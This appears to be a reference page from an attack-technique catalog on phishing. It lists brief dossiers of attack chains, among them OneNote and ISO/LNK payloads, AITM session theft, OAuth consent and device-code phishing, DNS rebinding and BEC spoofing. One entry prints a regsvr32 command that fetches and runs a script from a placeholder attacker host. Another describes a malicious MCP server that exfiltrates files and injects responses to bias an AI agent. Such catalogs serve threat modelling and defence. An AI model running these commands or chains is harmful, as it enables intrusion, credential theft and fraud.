Phishing

§ Where this technique fits

§ Dossiers chaining this technique

• V8 type-confusion 1-day → renderer RCE

  Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.

  step 1 / 7

• OneNote .one attachment → embedded payload → C2

  OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.

  step 1 / 6

• ISO container → LNK → stage from CDN → C2

  Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.

  step 1 / 6

• Rowhammer → bit flip → in-browser sandbox escape

  JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.

  step 1 / 6

• Malicious MCP server → silent supply chain for agent tools

  User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.

  step 2 / 6

• FIDO2 caBLE hybrid → phone authenticator hijack

  Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.

  step 2 / 6

• Squiblydoo: regsvr32 → remote SCT execution

  regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.

  step 2 / 5

• OAuth device-code phishing → M365 access without a fake page

  Initiate a device-code flow against login.microsoftonline.com; send the code + url to the victim via email or chat. Once they enter it, attacker gets access + refresh tokens.

  step 2 / 6

• Browser-in-the-Browser → credential theft on a trusted page

  Render a fake SSO popup inside the attacker page that looks like a real OS browser window. Victim types their credentials into the attacker's DOM.

  step 2 / 6

• AITM phishing (Evilginx) → M365 session theft → mailbox exfil

  Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.

  step 2 / 7

• DNS rebinding → access internal router admin from a browser

  Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.

  step 3 / 6

• Gatekeeper bypass → unsigned binary execution

  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.

  step 3 / 5

• Entra app consent phishing → Global Admin equivalent

  Phish a privileged user to consent to an OAuth app requesting Directory.ReadWrite.All + RoleManagement.ReadWrite.Directory — the app then grants itself Global Administrator.

  step 3 / 6

• Compromised vendor mailbox → reply-chain phishing → client compromise

  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.

  step 4 / 6

• Header smuggling → gateway sees vendor, mailbox sees attacker

  Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.

  step 4 / 6

• Deeplink abuse → in-app account takeover

  Exported activity registers a custom URL scheme that triggers an OAuth-style 'confirm reset' action without validating the source — phishing URL clicks reset another user's password.

  step 4 / 6

• OAuth redirect_uri misconfig → account takeover

  Provider accepts loose redirect_uri matching (wildcard, partial, open-redirect chain). Steal the authorization code by redirecting it through an attacker host.

  step 5 / 8

• Permissive SPF / DMARC p=none → CEO impersonation BEC

  Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.

  step 6 / 7

§ What commonly comes next

1. 01
   User Execution

   T1204 · Execution
   seen 7×
2. 02
   Business Email Compromise — Invoice Fraud

   SE-BEC-INVOICE · Impact
   seen 1×
3. 03
   DNS Rebinding

   DNS-REBINDING · Lateral Movement
   seen 1×
4. 04
   Entra App Consent Phishing

   C-AZ-APP-CONSENT · Privilege Escalation
   seen 1×
5. 05
   FIDO2 caBLE / Hybrid Transport Abuse

   AUTH-FIDO2-CABLE · Credential Access
   seen 1×
6. 06
   ISO / IMG Mounting → LNK Execution

   PAY-ISO-LNK · Execution
   seen 1×
7. 07
   Insecure Direct Object Reference (IDOR)

   W-IDOR · Privilege Escalation
   seen 1×
8. 08
   MFA Fatigue / Prompt Bombing

   PH-MFA-FATIGUE · Initial Access
   seen 1×